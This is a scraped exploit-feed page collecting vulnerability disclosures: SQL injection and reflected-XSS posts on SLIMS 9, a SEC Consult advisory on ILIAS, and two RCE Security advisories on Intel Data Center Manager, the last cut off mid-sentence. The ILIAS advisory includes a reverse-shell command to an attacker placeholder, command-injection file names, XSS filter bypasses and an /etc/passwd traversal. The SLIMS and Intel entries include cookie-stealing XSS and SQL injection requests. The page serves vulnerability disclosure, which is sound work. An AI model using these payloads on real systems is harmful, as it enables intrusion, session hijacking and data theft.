Latest exploits :: CodePwn

<pre><code>## Title: Senayan Library Management System v9.1.0 a.k.a SLIMS 9 SQLi ## Author: nu11secur1ty ## Date: 11.09.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.0/slims9_bulian-9.1.0.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin ## Description: The manual insertion `point 3` with the `class` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the manual insertion `point 3`, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL --- Parameter: class (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT (CASE WHEN (8842=8842) THEN 0x626262622727 ELSE 0x28 END)) AND 'iuDJ'='iuDJ&membershipType=a''&collType=aaaa --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin) ## Proof and Exploit: [href](https://streamable.com/qptgmu) ## Time spent `01:00:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 Multiple XSS-Reflected vulnerabilities ## Author: nu11secur1ty ## Date: 12.09.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0 ## Description: The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhc was submitted in the keywords parameter. This input was echoed unmodified in the application's response. ## STATUS: HIGH Vulnerability [+] Payload: ```GET GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+] Response: ```HTTP/1 HTTP/1.1 200 OK Date: Fri, 09 Dec 2022 06:23:20 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29492  <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Open Source Library Management System | Senayan</title> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/> <meta name="description" content="Open Source Library Management System | Senayan"> <meta name="keywords" content="Open Source Library Management System"> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1"> <meta name="generator" content="SLiMS 9 (Bulian)"> <meta name="theme-color" content="#000"> <meta property="og:locale" content="en_US"/> <meta property="og:type" content="book"/> <meta property="og:title" content="Open Source Library Management System | Senayan"/> <meta property="og:description" content="Open Source Library Management System"/> <meta property="og:url" content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0) ## Proof and Exploit: [href](https://streamable.com/ac60v3) ## Time spent `01:00:00` </code></pre>

<pre><code>## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 XSS-Reflected- PHPSESSID Hijacking ## Author: nu11secur1ty ## Date: 12.08.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://slims.web.id/web/news/rilis-9.4.0/ ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0 ## Description: The value of the `destination` request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmygl was submitted in the destination parameter. This input was echoed unmodified in the application's response. The attacker can hijack the session of some users of the system. ## STATUS: HIGH Vulnerability [+] Payload: ```GET GET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=member Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+] Response: ```HTTP/1 HTTP/1.1 200 OK Date: Thu, 08 Dec 2022 18:43:20 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30590  <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Open Source Library Management System | Senayan</title> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/> <meta name="robots" content="noindex, follow"> <meta name="description" content="Open Source Library Management System | Senayan"> <meta name="keywords" content="Open Source Library Management System"> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1"> <meta name="generator" content="SLiMS 9 (Bulian)"> <meta name="theme-color" content="#000"> <meta property="og:locale" content="en_US"/> <meta property="og:type" content="book"/> <meta property="og:title" content="Open Source Library Management System | Senayan"/> <meta property="og:description" content="Open Source Library Management System"/> <meta property="og:url" content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/> <meta property="og:site_name" content="Senayan"/> <meta property="og:image" content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/> <meta name="twitter:card" content="summary"> <meta name="twitter:url" content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/> <meta name="twitter:title" content="Open Source Library Management System | Senayan"/> <meta property="twitter:image" content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>  <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">  <link rel="stylesheet" href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">  <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">  <link rel="stylesheet" href="template/default/assets/plugin/vegas/vegas.min.css"> <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320" rel="stylesheet" type="text/css"/>  <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">  <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">  <link rel="stylesheet" href="template/default/assets/css/style.css?v=20221209-014320"> <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>  <script src="template/default/assets/js/vue.min.js"></script>  <script src="template/default/assets/js/jquery.min.js"></script>  <script src="template/default/assets/js/popper.min.js"></script>  <script src="template/default/assets/js/bootstrap.min.js"></script>  <script src="template/default/assets/plugin/vegas/vegas.min.js"></script> <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>  <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script> <script src="/slims9_bulian-9.4.0/js/gui.js"></script> <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script> </head> <body class="bg-grey-lightest"> <div class="result-search page-member-area"> <section id="section1 container-fluid"> <header class="c-header"> <div class="mask"></div> <nav class="navbar navbar-expand-lg navbar-dark bg-transparent"> <a class="navbar-brand inline-flex items-center" href="index.php"> <svg class="fill-current text-white inline-block h-8 w-8" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;" xml:space="preserve"> <path d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1 l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2 c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4 C118.4,98.6,118.3,98.5,118.3,98.3z M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6 L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0 c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/> </svg> <div class="inline-flex flex-col leading-tight ml-2"> <h1 class="text-lg m-0 p-0">Senayan</h1> </div> </a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav ml-auto"> <li class="nav-item "> <a class="nav-link" href="index.php">Home</a> </li><li class="nav-item "> <a class="nav-link" href="index.php?p=libinfo">Information</a> </li><li class="nav-item "> <a class="nav-link" href="index.php?p=news">News</a> </li><li class="nav-item "> <a class="nav-link" href="index.php?p=help">Help</a> </li><li class="nav-item "> <a class="nav-link" href="index.php?p=librarian">Librarian</a> </li> <li class="nav-item active"> <a class="nav-link" href="index.php?p=member">Member Area</a> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle cursor-pointer" type="button" id="languageMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> style="border-radius: 2px;"> </a> <div class="dropdown-menu bg-grey-lighter dropdown-menu-lg-right" aria-labelledby="dropdownMenuButton"> <h6 class="dropdown-header">Select Language : </h6> <a class="dropdown-item" href="index.php?select_lang=ar_SA"> style="border-radius: 2px;"> Arabic </a> <a class="dropdown-item" href="index.php?select_lang=bn_BD"> style="border-radius: 2px;"> Bengali </a> <a class="dropdown-item" href="index.php?select_lang=pt_BR"> style="border-radius: 2px;"> Brazilian Portuguese </a> <a class="dropdown-item" href="index.php?select_lang=en_US"> style="border-radius: 2px;"> English </a> <a class="dropdown-item" href="index.php?select_lang=es_ES"> style="border-radius: 2px;"> Espanol </a> <a class="dropdown-item" href="index.php?select_lang=de_DE"> style="border-radius: 2px;"> German </a> <a class="dropdown-item" href="index.php?select_lang=id_ID"> style="border-radius: 2px;"> Indonesian </a> <a class="dropdown-item" href="index.php?select_lang=ja_JP"> style="border-radius: 2px;"> Japanese </a> <a class="dropdown-item" href="index.php?select_lang=my_MY"> style="border-radius: 2px;"> Malay </a> <a class="dropdown-item" href="index.php?select_lang=fa_IR"> style="border-radius: 2px;"> Persian </a> <a class="dropdown-item" href="index.php?select_lang=ru_RU"> style="border-radius: 2px;"> Russian </a> <a class="dropdown-item" href="index.php?select_lang=th_TH"> style="border-radius: 2px;"> Thai </a> <a class="dropdown-item" href="index.php?select_lang=tr_TR"> style="border-radius: 2px;"> Turkish </a> <a class="dropdown-item" href="index.php?select_lang=ur_PK"> style="border-radius: 2px;"> Urdu </a> </div> </li> </ul> </div> </nav> </header> <div class="search" id="search-wraper" xmlns:v-bind="http://www.w3.org/1999/xhtml"> <div class="container"> <div class="row"> <div class="col-lg-8 mx-auto"> <div class="card border-0 shadow"> <div class="card-body"> <form class="" action="index.php" method="get" @submit.prevent="searchSubmit"> <input type="hidden" name="search" value="search"> <input ref="keywords" value="" v-model.trim="keywords" @focus="searchOnFocus" @blur="searchOnBlur" type="text" id="search-input" name="keywords" class="input-transparent w-100" autocomplete="off" placeholder="Enter keyword to search collection..."/> </form> </div> </div> <transition name="slide-fade"> <div v-if="show" class="advanced-wraper shadow mt-4" id="advanced-wraper" v-click-outside="hideSearch"> Search by : <i @click="hideSearch" class="far fa-times-circle float-right text-danger cursor-pointer"> <div class="d-flex flex-wrap"> <a v-bind:class="{'btn-primary text-white': searchBy === 'keywords', 'btn-outline-secondary': searchBy !== 'keywords' }" @click="searchOnClick('keywords')" class="btn mr-2 mb-2">ALL</a> <a v-bind:class="{'btn-primary text-white': searchBy === 'author', 'btn-outline-secondary': searchBy !== 'author' }" @click="searchOnClick('author')" class="btn mr-2 mb-2">Author</a> <a v-bind:class="{'btn-primary text-white': searchBy === 'subject', 'btn-outline-secondary': searchBy !== 'subject' }" @click="searchOnClick('subject')" class="btn mr-2 mb-2">Subject</a> <a v-bind:class="{'btn-primary text-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy !== 'isbn' }" @click="searchOnClick('isbn')" class="btn mr-2 mb-2">ISBN/ISSN</a> <button class="btn btn-light mr-2 mb-2" disabled>OR TRY</button> <a class="btn btn-outline-primary mr-2 mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a> </div> 0" class="label mt-4">Last search: <a :href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`" class="flex items-center justify-between py-1 text-decoration-none text-grey-darkest hover:text-blue" v-for="k in lastKeywords" :key="k"><i class="far fa-clock text-grey-dark mr-2">text-sm">{{tmpObj[k].text}}<i class="fas fa-angle-right text-grey-dark"></a> </div> </transition> </div> </div> </div> </div> </section> <div class="container py-4"> <div class="row"> <div class="col-md-8"> <div> <div class="tagline">Library Member Login</div> <div class="loginInfo">Please insert your member ID and password given by library system administrator. If you are library's member and don't have a password yet, please contact library staff.</div> <div class="loginInfo"> <form action="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl" method="post"> <div class="fieldLabel">Member ID</div> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0) ## Proof and Exploit: [href](https://streamable.com/dsl863) ## Time spent `01:30:00` </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221206-0 > ======================================================================= title: Multiple critical vulnerabilities product: ILIAS eLearning platform vulnerable version: <= 7.15 fixed version: 7.16 CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917, CVE-2022-45918 impact: critical homepage: https://www.ilias.de found: 2022-09-30 by: Anna Hartig (Office Bochum) Constantin Schwarz (Office Bochum) Niklas Schilling (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Around since 1998, ILIAS is a powerful learning management system that fulfills all your requirements. Using its integrated tools, small and large businesses, universities, schools and public authorities are able to create tailored, individual learning scenarios." Source: https://www.ilias.de/en/ Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Authenticated Direct OS Command Injection - CVE-2022-45915 ILIAS utilizes several third-party programs to perform tasks like creating PDF files or scanning uploaded files for known viruses. These are called using the PHP exec() function. In several instances, the arguments passed to the exec() function contain user input that is not properly sanitized. By performing malicious configuration steps or uploading dangerous files, an attacker can execute arbitrary system commands with the rights of the web server user (www-data). The privilege required for the different instances of command injection range from low rights to admin rights. 2) Stored Cross-Site Scripting - CVE-2022-45916 Multiple stored cross-site scripting vulnerabilities were identified in ILIAS course items. These were either achieved by bypassing existing XSS filters or simply by exploiting missing input validation altogether. This results in the execution of attacker-controlled JavaScript code by the user's browser. The attacker requires the right to create course items, e.g., as a tutor of a course. 3) Local File Inclusion - CVE-2022-45918 The included SCORM editor features a debugger that gives authors insights into the current SCORM player session, as well as previous sessions. When accessing the logs of previous sessions, the debugger fails to validate the requested file path, allowing for arbitrary filesystem access. 4) Open Redirect - CVE-2022-45917 The function shib_logout.php redirects the user to a URL specified in the "return" parameter. Since this parameter is not validated, an attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool in phishing campaigns, as it allows hiding the malicious webpage behind a link that looks like it would take you to the real ILIAS webpage. Proof of concept: ----------------- 1) Authenticated Direct OS Command Injection - CVE-2022-45915 Multiple instances of command injection vulnerabilities were identified: a) ZIP archive upload Normal users with open assessments can submit their solution by uploading a ZIP archive. These archives are extracted on the server and scanned for viruses recursively. The directory and file names can be used by an attacker to inject system commands, e.g., by including a directory with the name $(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker is able to get a reverse shell on the ILIAS webserver with the rights of the web server user (www-data). b) Media object creation ILIAS can be configured so that users can create media objects based on files inside an "Upload Directory". Before these objects are created, the files are scanned for viruses. The file names can be used by an attacker to inject system commands. By placing a file with a name like $(touch /tmp/pwned) inside the upload directory and then creating a media object based on it, an attacker is able to execute arbitrary system commands with the rights of www-data on the server. c) PDF document creation ILIAS provides users the functionality to export content as PDF files. A user with admin rights can configure the path to the preferred PDF renderer. An attacker can use this parameter to inject system commands. Due to missing input validation it is possible to inject multiple commands. The path to wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By changing the path to: /usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1"; an attacker can open a reverse shell with the rights of www-data that connects to the attacker's machine on port 13373. The reverse shell is initiated when the export function is triggered. No PDF renderer has to be installed for this vulnerability to be exploitable. 2) Stored Cross-Site Scripting - CVE-2022-45916 Multiple instances of stored cross-site scripting were identified: a) Several Stored XSS Attacks in Tests An attacker must be able to create new tests in which the JavaScript code will be embedded. If a victim then later accesses one of those tests, the XSS payload will be triggered. The "Question" input field of a test has a filter in place, which correctly removes HTML tags such as <script> or <img src="x" onerror="alert(document.cookie)">. By making use of half open HTML tags, this filter can be successfully bypassed. E.g. <img src="x" onerror="alert(document.cookie)" This half open HTML tag can also be used in the "Introductory Message" of a test to trigger an XSS. It's important to end the JavaScript code with a quotation mark or space, to properly separate it from successive HTML tags, after it's embedded into a test. Finally, the "Question" input field of the question type "Long Menu" was identified to use no filtering at all, resulting in the unrestricted use of arbitrary HTML tags such as <script>. b) Stored XSS in title of course items An attacker with rights to create an arbitrary course item can conduct a stored XSS attack by setting the title of the element to: " onclick="alert(document.cookie)" When a user clicks on the button to the right of the title, the XSS payload is triggered. c) Stored XSS in HTML sites An attacker with rights to edit an HTML Learning Module can conduct a stored XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even if this behavior is intended, it is insecure and considered bad practice. 3) Local File Inclusion - CVE-2022-45918 As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS platform. An attacker with access to a SCORM player can open the SCORM debugger and request the logs of a previous session. By changing the value of the "logFile" query parameter of the request, they can read arbitrary files of the server's filesystem. For example, to read the passwd file on Linux systems, an attacker can change the value of the parameter logfile to "../../../../../../../../../etc/passwd". 4) Open Redirect - CVE-2022-45917 The shib_logout function is vulnerable to an open redirect. A URL that successfully uses this vulnerability to redirect to "https://www.sec-consult.com" is: http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com Vulnerable / tested versions: ----------------------------- The vulnerabilities were identified in ILIAS version 7.14. However, a brief analysis of the source code suggests, that several vulnerabilities are present in versions dating back to at least 3.8.4. Hence it is assumed that most current versions of the product are affected. The vulnerabilities were partly fixed in version 7.15, a complete patch is available with version 7.16. Vendor contact timeline: ------------------------ 2022-10-07: Contacting vendor through security@lists.ilias.de 2022-10-19: Sending initial email again, as the vendor did not yet respond 2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and identified personal email addresses from the vendor's website. 2022-10-25: Sending the advisory to the provided contact 2022-10-31: Vendor requests more information 2022-10-31: Sending detailed PoC 2022-11-10: Asking for current status 2022-11-22: Vendor confirms that patches will be available by 2022-11-26 2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs 2022-11-23: Vendor provides information about patched versions; CVE IDs will be requested by SEC Consult 2022-11-24: Vendor releases patched version 7.16 2022-12-06: Public release of security advisory Solution: --------- Update ILIAS to version 7.16 or newer from the vendor's website: https://docu.ilias.de/goto.php?target=st_229 Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Hartig, C. Schwarz, N. Schilling / @2022 </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Intel Data Center Manager Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html Type: SQL Injection [CWE-89] Date found: 2022-01-21 Date published: 2022-12-01 CVSSv3 Score: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) CVE: CVE-2022-21225 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Intel Data Center Manager 4.1 and below 4. INTRODUCTION =============== Energy costs are the fastest rising expense for today’s data centers. Intel® Data Center Manager (Intel® DCM) provides real-time power and thermal consumption data, giving you the clarity you need to lower power usage, increase rack density, and prolong operation during outages. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== Intel DCM's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" is vulnerable to an authenticated, blind SQL Injection when user-supplied input to the HTTP POST parameter "dataName" is processed by the web application. Since the application does not properly validate and sanitize this parameter, an attacker can inject arbitrary SQL commands against the PostgreSQL backend database server of the web application. Successful exploits can allow an authenticated attacker (the lowest possible authorization level "Guest" is sufficient) to read and modify database contents and execute any system commands on the underlying operating system. This way, the attacker can compromise the system's entire confidentiality, integrity, and availability. 6. PROOF OF CONCEPT =================== POST /DcmConsole/DataAccessServlet?action=getRoomRackData HTTP/1.1 Host: [ip-address] Cookie: JSESSIONID=[session-id] Content-Length: 153 Accept: application/json, text/plain, */* Content-Type: text/plain User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close {"antiCSRFId":"[your-anti-csrf-id]","requestObj":{"snapshotId":1,"roomId":1,"dataName":"test');SELECT PG_SLEEP(5)--"}} (see the referenced blog post for more details) 7. SOLUTION =========== Update at least to version 5.0.0.46307. 8. REPORT TIMELINE ================== 2022-01-21: Discovery of the vulnerability 2022-01-21: Reported to vendor via their bug bounty program 2022-01-21: Vendor response: Sent to "appropriate reviewers" 2022-02-08: Vendor acknowledges the vulnerability with a severity of "medium" without sharing their CVSS calculation 2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.8 2022-02-16: I don't accept the rating because the vendor downplayed it 2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) 2022-02-25: Apparently AV:A is still wrong, but I don't have more energy to fight them. However this advisory contains the proper CVSS rating. 2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix 2022-08-09: Vendor releases advisory INTEL-SA-00662 2022-12-01: Public disclosure 9. REFERENCES ============== https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225/ https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00662.html https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Intel Data Center Manager Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html Type: Incorrect Use of Privileged APIs [CWE-648] Date found: 2022-07-16 Date published: 2022-12-07 CVSSv3 Score: 7.4 (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) CVE: - 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Intel Data Center Manager 5.1 (latest) and below 4. INTRODUCTION =============== Energy costs are the fastest rising expense for today’s data centers. Intel® Data Center Manager (Intel® DCM) provides real-time power and thermal consumption data, giving you the clarity you need to lower power usage, increase rack density, and prolong operation during outages. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The latest version (5.1) and all prior versions of Intel's DCM are vulnerable to a local privileges escalation vulnerability using the application user "dcm" used to run the web application and the rest interface. An attacker who gained RCE using this dcm user (i.e., through Log4j) is then able to escalate their privileges to root by abusing a weak Sudo configuration for the "dcm" user: dcm ALL=(ALL) NOPASSWD:/usr/local/bin/SDPTool dcm ALL=(ALL) NOPASSWD:/usr/bin/cp dcm ALL=(ALL) NOPASSWD:/usr/bin/chmod The Intel Server Debug and Provisioning Tool (SDP Tool) must be installed for the Data Center Manager to be vulnerable. Successful exploits can allow an authenticated attacker to execute commands as root. In this way, the attacker can compromise the victim system's entire confidentiality, integrity, and availability, thereby 